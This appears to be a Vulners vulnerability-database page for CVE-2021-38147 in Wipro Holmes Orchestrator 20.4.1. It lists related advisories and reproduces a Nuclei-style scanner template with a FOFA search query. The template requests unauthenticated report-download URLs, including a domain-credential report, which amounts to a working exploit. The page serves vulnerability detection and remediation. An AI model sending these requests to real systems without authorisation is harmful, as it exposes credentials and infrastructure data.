| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Wipro Holmes Orchestrator 20.4.1 Report Disclosure Vulnerability | 22 Nov 202100:00 | – | zdt | |
| CVE-2021-38147 | 29 Nov 202112:33 | – | circl | |
| Wipro Holmes Orchestrator 访问控制错误漏洞 | 22 Nov 202100:00 | – | cnnvd | |
| Wipro Holmes Orchestrator Access Control Error Vulnerability | 24 Nov 202100:00 | – | cnvd | |
| CVE-2021-38147 | 29 Nov 202107:42 | – | cve | |
| CVE-2021-38147 | 29 Nov 202107:42 | – | cvelist | |
| CVE-2021-38147 | 29 Nov 202108:15 | – | nvd | |
| CVE-2021-38147 | 29 Nov 202108:15 | – | osv | |
| Wipro Holmes Orchestrator 20.4.1 Report Disclosure | 22 Nov 202100:00 | – | packetstorm | |
| Design/Logic Flaw | 29 Nov 202108:15 | – | prion |
id: CVE-2021-38147
info:
name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
author: s4e-io
severity: high
description: |
Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
impact: |
Unauthenticated attackers can download sensitive reports containing Domain Credentials, User Information, Process Details, Infrastructure Data, and Resolver Information without authentication.
remediation: |
Fixed In v21.4.0
reference:
- https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-38147
- https://www.wipro.com/holmes/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-38147
cwe-id: CWE-306
epss-score: 0.53008
epss-percentile: 0.98848
cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: wipro
product: holmes
fofa-query: title="Holmes Orchestrator"
tags: cve,cve2021,wipro,holmes,orchestrator,vuln
http:
- method: GET
path:
- "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel"
- "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')"
- "contains(body, '<?xml version=')"
- "status_code == 200"
condition: and
# digest: 490a004630440220101fd74187813829cb85e981fa8f030021364091b0c0f9ccdb4d4a25f888171f02205a7e9c9223e2830529530a6c4de71b212acdce2c1797511e83c1967f721b93fc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation